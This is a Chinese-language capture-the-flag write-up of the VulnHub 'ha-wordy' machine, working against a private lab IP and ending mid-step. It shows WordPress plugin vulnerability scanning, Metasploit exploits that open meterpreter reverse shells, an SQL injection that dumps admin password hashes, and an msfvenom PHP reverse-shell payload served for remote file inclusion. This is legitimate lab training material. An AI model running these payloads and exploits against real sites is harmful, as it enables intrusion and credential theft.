ha-wordy-Write-up

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
➜  ~ nmap -sn 192.168.116.1/24      
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 22:08 CST
Nmap scan report for 192.168.116.1
Host is up (0.0025s latency).
Nmap scan report for 192.168.116.138
Host is up (0.00072s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.94 seconds
➜ ~ nmap -A -T4 192.168.116.138 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 22:09 CST
Nmap scan report for 192.168.116.138
Host is up (0.0039s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds
➜ ~
  • IP为:192.168.116.138,只开放了一个80端口,主页还是Apache2的默认页。
  • 先扫目录,-r不递归扫
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜  ~ dirb http://192.168.116.138 -r

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Sep 25 22:17:39 2019
URL_BASE: http://192.168.116.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.116.138/ ----
+ http://192.168.116.138/index.html (CODE:200|SIZE:10918)
+ http://192.168.116.138/info.php (CODE:200|SIZE:15)
==> DIRECTORY: http://192.168.116.138/javascript/
+ http://192.168.116.138/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.116.138/wordpress/

-----------------
END_TIME: Wed Sep 25 22:17:42 2019
DOWNLOADED: 4612 - FOUND: 3
➜ ~
  • 发现了一个info.php,又是WordPress。
1
2
➜  ~ curl "http://192.168.116.138/info.php"          
192.168.116.138% ➜ ~
  • 访问info.php返回了服务器端的IP地址,那再扫WordPress
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
➜  ~ wpscan --url http://192.168.116.138/wordpress/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.116.138/wordpress/
[+] Started: Wed Sep 25 22:23:22 2019

Interesting Finding(s):

[+] http://192.168.116.138/wordpress/
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.116.138/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.116.138/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.116.138/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://192.168.116.138/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.2.3 identified (Latest, released on 2019-09-05).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.116.138/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
| - http://192.168.116.138/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: twentysixteen
| Location: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/
| Latest Version: 2.0 (up to date)
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/readme.txt
| Style URL: http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 2.0 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.116.138/wordpress/wp-content/themes/twentysixteen/style.css?ver=5.2.3, Match: 'Version: 2.0'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
| Location: http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
| References:
| - https://wpvulndb.com/vulnerabilities/8609
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
| - https://www.exploit-db.com/exploits/40290/
| - https://cxsecurity.com/issue/WLB-2016080220
|
| [!] Title: Mail Masta 1.0 - Multiple SQL Injection
| References:
| - https://wpvulndb.com/vulnerabilities/8740
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6570
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6571
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6572
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6573
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6574
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6575
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6576
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6577
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6578
| - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
|
| Version: 1.0 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
| Location: http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2019-05-10T16:05:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
| Fixed in: 3.1.4
| References:
| - https://wpvulndb.com/vulnerabilities/7867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133
| - https://www.exploit-db.com/exploits/36374/
| - https://packetstormsecurity.com/files/130845/
| - https://packetstormsecurity.com/files/131515/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
|
| [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
| References:
| - https://wpvulndb.com/vulnerabilities/7985
| - https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
| - https://github.com/scaron/prettyphoto/issues/149
| - https://github.com/wpscanteam/wpscan/issues/818
|
| Version: 3.1.3 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[+] site-editor
| Location: http://192.168.116.138/wordpress/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
| References:
| - https://wpvulndb.com/vulnerabilities/9044
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
| - http://seclists.org/fulldisclosure/2018/Mar/40
| - https://github.com/SiteEditor/editor/issues/2
|
| Version: 1.1.1 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/site-editor/readme.txt

[+] slideshow-gallery
| Location: http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/
| Last Updated: 2019-07-12T13:09:00.000Z
| [!] The version is out of date, the latest version is 1.6.12
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 5 vulnerabilities identified:
|
| [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
| Fixed in: 1.4.7
| References:
| - https://wpvulndb.com/vulnerabilities/7532
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
| - https://www.exploit-db.com/exploits/34681/
| - https://www.exploit-db.com/exploits/34514/
| - http://seclists.org/bugtraq/2014/Sep/1
| - https://packetstormsecurity.com/files/131526/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
|
| [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
| Fixed in: 1.5.3.4
| References:
| - https://wpvulndb.com/vulnerabilities/8263
| - http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
| - http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
|
| [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 1.6.5
| References:
| - https://wpvulndb.com/vulnerabilities/8786
| - https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
| - https://plugins.trac.wordpress.org/changeset/1609730/slideshow-gallery
|
| [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
| Fixed in: 1.6.6
| References:
| - https://wpvulndb.com/vulnerabilities/8795
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17946
| - http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf
| - https://packetstormsecurity.com/files/142079/DC-2017-01-014.pdf
|
| [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi
| Fixed in: 1.6.9
| References:
| - https://wpvulndb.com/vulnerabilities/9354
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18017
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18018
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18019
| - https://plugins.trac.wordpress.org/changeset?reponame=&new=1974812%40slideshow-gallery&old=1907382%40slideshow-gallery
| - https://ansawaf.blogspot.com/2019/04/xss-and-sqli-in-slideshow-gallery.html
|
| Version: 1.4.6 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/slideshow-gallery/readme.txt

[+] wp-easycart-data
| Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-easycart-data/
|
| Detected By: Urls In Homepage (Passive Detection)
|
| The version could not be determined.

[+] wp-support-plus-responsive-ticket-system
| Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: WP Support Plus Responsive Ticket System <= 7.1.3 – Authenticated SQL Injection
| Fixed in: 8.0.0
| References:
| - https://wpvulndb.com/vulnerabilities/8699
| - https://www.exploit-db.com/exploits/40939/
| - http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
| - https://plugins.trac.wordpress.org/changeset/1556644/wp-support-plus-responsive-ticket-system
|
| [!] Title: WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution (RCE)
| Fixed in: 8.0.8
| References:
| - https://wpvulndb.com/vulnerabilities/8949
| - https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
|
| [!] Title: WP Support Plus Responsive Ticket System <= 9.0.2 - Multiple Authenticated SQL Injection
| Fixed in: 9.0.3
| References:
| - https://wpvulndb.com/vulnerabilities/9041
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000131
| - https://github.com/00theway/exp/blob/master/wordpress/wpsupportplus.md
| - https://plugins.trac.wordpress.org/changeset/1814103/wp-support-plus-responsive-ticket-system
|
| [!] Title: WP Support Plus Responsive Ticket System <= 9.1.1 - Stored XSS
| Fixed in: 9.1.2
| References:
| - https://wpvulndb.com/vulnerabilities/9235
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7299
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15331
| - https://cert.kalasag.com.ph/news/research/cve-2019-7299-stored-xss-in-wp-support-plus-responsive-ticket-system/
| - https://plugins.trac.wordpress.org/changeset/2024484/wp-support-plus-responsive-ticket-system
|
| Version: 7.1.3 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

[+] wp-symposium
| Location: http://192.168.116.138/wordpress/wp-content/plugins/wp-symposium/
| Last Updated: 2015-08-21T12:36:00.000Z
| [!] The version is out of date, the latest version is 15.8.1
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 7 vulnerabilities identified:
|
| [!] Title: WP Symposium 13.04 - Unvalidated Redirect
| References:
| - https://wpvulndb.com/vulnerabilities/6383
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2694
|
| [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass
| Reference: https://wpvulndb.com/vulnerabilities/6390
|
| [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload
| References:
| - https://wpvulndb.com/vulnerabilities/7716
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-10021
| - https://www.exploit-db.com/exploits/35543/
| - https://www.exploit-db.com/exploits/35778/
| - http://www.homelab.it/index.php/2014/12/11/wordpress-wp-symposium-shell-upload/
| - https://www.youtube.com/watch?v=pF8lIuLT6Vs
| - http://blog.sucuri.net/2014/12/wp-symposium-zero-day-vulnerability-dangers.html
| - https://packetstormsecurity.com/files/129884/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
|
| [!] Title: WP Symposium <= 15.1 - SQL Injection
| Fixed in: 15.4
| References:
| - https://wpvulndb.com/vulnerabilities/7902
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
| - https://www.exploit-db.com/exploits/37080/
| - http://web.archive.org/web/20150718010246/http://permalink.gmane.org/gmane.comp.security.oss.general/16479
| - https://packetstormsecurity.com/files/131801/
|
| [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
| Fixed in: 15.8
| References:
| - https://wpvulndb.com/vulnerabilities/8140
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
| - https://www.exploit-db.com/exploits/37824/
| - https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
|
| [!] Title: WP Symposium <= 15.1 - Blind SQL Injection
| Fixed in: 15.8
| References:
| - https://wpvulndb.com/vulnerabilities/8148
| - https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
|
| [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
| References:
| - https://wpvulndb.com/vulnerabilities/8175
| - http://cxsecurity.com/issue/WLB-2015090024
|
| Version: 15.1 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.116.138/wordpress/wp-content/plugins/wp-symposium/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.


[+] Finished: Wed Sep 25 22:23:25 2019
[+] Requests Done: 78
[+] Cached Requests: 5
[+] Data Sent: 23.706 KB
[+] Data Received: 17.527 MB
[+] Memory used: 207.039 MB
[+] Elapsed time: 00:00:03
➜ ~
  • 这次还真扫出来可以利用的漏洞了,文件包含,SQL注入,文件上传,RCE都有。

  • SQL注入的:

1
2
3
https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin-SQL-Injection-Vulnerability
https://ansawaf.blogspot.com/2019/04/xss-and-sqli-in-slideshow-gallery.html
https://www.exploit-db.com/exploits/40939/
  • 文件包含的:
1
https://www.exploit-db.com/exploits/40290/
  • 文件上传的:
1
2
3
4
5
6
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
https://www.exploit-db.com/exploits/36374/
https://www.exploit-db.com/exploits/34681/
https://www.exploit-db.com/exploits/34514/
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
  • 绕过认证的:
1
https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
  • 利用链接,rapid7的在MSF里都可以直接利用,exp-db要手动测试。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  ~ wpscan --enumerate p --url http://192.168.116.138/wordpress/ |grep exp   
| - https://www.exploit-db.com/exploits/40290/
| - https://www.exploit-db.com/exploits/36374/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
| - https://www.exploit-db.com/exploits/34681/
| - https://www.exploit-db.com/exploits/34514/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
| - https://www.exploit-db.com/exploits/40939/
| - https://github.com/00theway/exp/blob/master/wordpress/wpsupportplus.md
| - https://www.exploit-db.com/exploits/35543/
| - https://www.exploit-db.com/exploits/35778/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_symposium_shell_upload
| - https://www.exploit-db.com/exploits/37080/
| - https://www.exploit-db.com/exploits/37824/
➜ ~
  • 为了方便就直接使用MSF了,应该这几个都可以用。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > show options 

Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.138 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.116.1 yes The listen address (an interface may be specified)
LPORT 7788 yes The listen port


Exploit target:

Id Name
-- ----
0 Reflex Gallery 3.1.3


msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) >
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > run

[*] Started reverse TCP handler on 192.168.116.1:7788
[+] Our payload is at: QkwaQFsdu.php. Calling payload...
[*] Calling payload...
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 1 opened (192.168.116.1:7788 -> 192.168.116.138:41290) at 2019-09-26 10:28:04 +0800
[+] Deleted QkwaQFsdu.php
meterpreter >

SQL注入

  • 连着把其他的都试一遍,第二个需要账号密码试不了。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
msf5 exploit(unix/webapp/wp_symposium_shell_upload) > use auxiliary/admin/http/wp_symposium_sql_injection 
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > show options

Module options (auxiliary/admin/http/wp_symposium_sql_injection):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
URI_PLUGIN wp-symposium yes The WordPress Symposium Plugin URI
VHOST no HTTP server virtual host

msf5 auxiliary(admin/http/wp_symposium_sql_injection) > set rhosts 192.168.116.138
rhosts => 192.168.116.138
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > set targeturi /wordpress
targeturi => /wordpress
msf5 auxiliary(admin/http/wp_symposium_sql_injection) > run
[*] Running module against 192.168.116.138

[+] 192.168.116.138:80 - admin $P$BYWgfD7pa572QS9YFoeVVmhrIhBAx0. [email protected]
[+] 192.168.116.138:80 -
[+] 192.168.116.138:80 - aarti $P$BHyn.q5e5/HG9/UT/Ow3xkH2xXsikx0 [email protected]
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_symposium_sql_injection) >
  • SQL注入获取到了密码,但是加密了,john爆破无果。

  • 回去看第一个session,切换到home目录找到第一个flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
meterpreter > cd raj
meterpreter > ls
Listing: /home/raj
==================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 4770 fil 2019-09-11 12:54:51 +0800 .ICEauthority
100600/rw------- 232 fil 2019-09-11 12:57:45 +0800 .bash_history
100644/rw-r--r-- 220 fil 2019-09-09 14:15:07 +0800 .bash_logout
100644/rw-r--r-- 3771 fil 2019-09-09 14:15:07 +0800 .bashrc
40700/rwx------ 4096 dir 2019-09-09 23:47:31 +0800 .cache
40700/rwx------ 4096 dir 2019-09-09 21:20:39 +0800 .config
40700/rwx------ 4096 dir 2019-09-09 21:20:05 +0800 .dbus
40700/rwx------ 4096 dir 2019-09-09 15:51:12 +0800 .gnupg
40700/rwx------ 4096 dir 2019-09-09 21:20:06 +0800 .gvfs
40700/rwx------ 4096 dir 2019-09-09 14:20:30 +0800 .local
40700/rwx------ 4096 dir 2019-09-09 14:34:23 +0800 .mozilla
100600/rw------- 39 fil 2019-09-09 15:23:00 +0800 .mysql_history
100644/rw-r--r-- 807 fil 2019-09-09 14:15:07 +0800 .profile
40700/rwx------ 4096 dir 2019-09-09 15:51:12 +0800 .ssh
100644/rw-r--r-- 0 fil 2019-09-09 14:21:21 +0800 .sudo_as_admin_successful
40755/rwxr-xr-x 4096 dir 2019-09-10 00:23:02 +0800 Desktop
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Documents
40755/rwxr-xr-x 4096 dir 2019-09-09 16:23:53 +0800 Downloads
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Music
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Pictures
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Public
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Templates
40755/rwxr-xr-x 4096 dir 2019-09-09 14:20:38 +0800 Videos
100644/rw-r--r-- 8980 fil 2019-09-09 14:15:07 +0800 examples.desktop
100644/rw-r--r-- 41 fil 2019-09-10 12:06:56 +0800 flag1.txt
40755/rwxr-xr-x 4096 dir 2019-09-09 16:18:54 +0800 plugin

meterpreter > cat flag1.txt
aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu
meterpreter >
➜ VulnHub echo "aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu" |base64 -d
https://www.hackingarticles.in%
  • 在网站的跟目录发现了一个notes.txt文件和一个加密了的zip压缩包
1
2
3
4
5
6
7
8
9
10
11
12
[email protected]:/var/www/html$ ls
ls
index.html info.php notes.txt secret.zip wordpress
[email protected]:/var/www/html$ cat notes.txt
cat notes.txt
You Need to ZIP Your Wayout
[email protected]:/var/www/html$ cat info.php
cat info.php
<?php
echo $_SERVER['HTTP_HOST'];
?>
[email protected]:/var/www/html$
  • 密码是上面SQL注入获取到admin密码的Hash
1
2
3
4
5
6
7
8
9
10
11
➜  VulnHub unzip secret.zip                                          
Archive: secret.zip
[secret.zip] link.txt password:
inflating: link.txt
➜ VulnHub cat link.txt
https://www.exploit-db.com/exploits/38861
https://www.exploit-db.com/exploits/40290
https://www.exploit-db.com/exploits/36374
https://www.exploit-db.com/exploits/37824
https://www.exploit-db.com/exploits/41006%
➜ VulnHub
  • 发现是一堆链接,好像就是我用wpscan扫出来的那些,所以好像没有什么作用,结合notes.txt提示,只是告诉你可以使用多种方法获取Shell。

CVE-2015-8351 远程文件包含

  • 第一个,远程文件包含
  • 开启MSF监听端口
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lport 2333
lport => 2333
msf5 exploit(multi/handler) > set lhost 192.168.116.1
lhost => 192.168.116.1
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.116.1 yes The listen address (an interface may be specified)
LPORT 2333 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.116.1:2333
[*] Sending stage (38247 bytes) to 192.168.116.138
[*] Meterpreter session 1 opened (192.168.116.1:2333 -> 192.168.116.138:42968) at 2019-09-26 11:45:39 +0800

meterpreter >
  • 搭建http,把shell改名为wp-load.php,启动http服务。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
➜  VulnHub msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.116.1 LPORT=2333 -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
Saved as: shell.php
➜ VulnHub python3.7 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.116.138 - - [26/Sep/2019 11:45:11] code 404, message File not found
192.168.116.138 - - [26/Sep/2019 11:45:11] "GET /shell.phpwp-load.php HTTP/1.0" 404 -
^C
Keyboard interrupt received, exiting.
➜ VulnHub
➜ VulnHub cp shell.php wp-load.php
➜ VulnHub python3.7 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
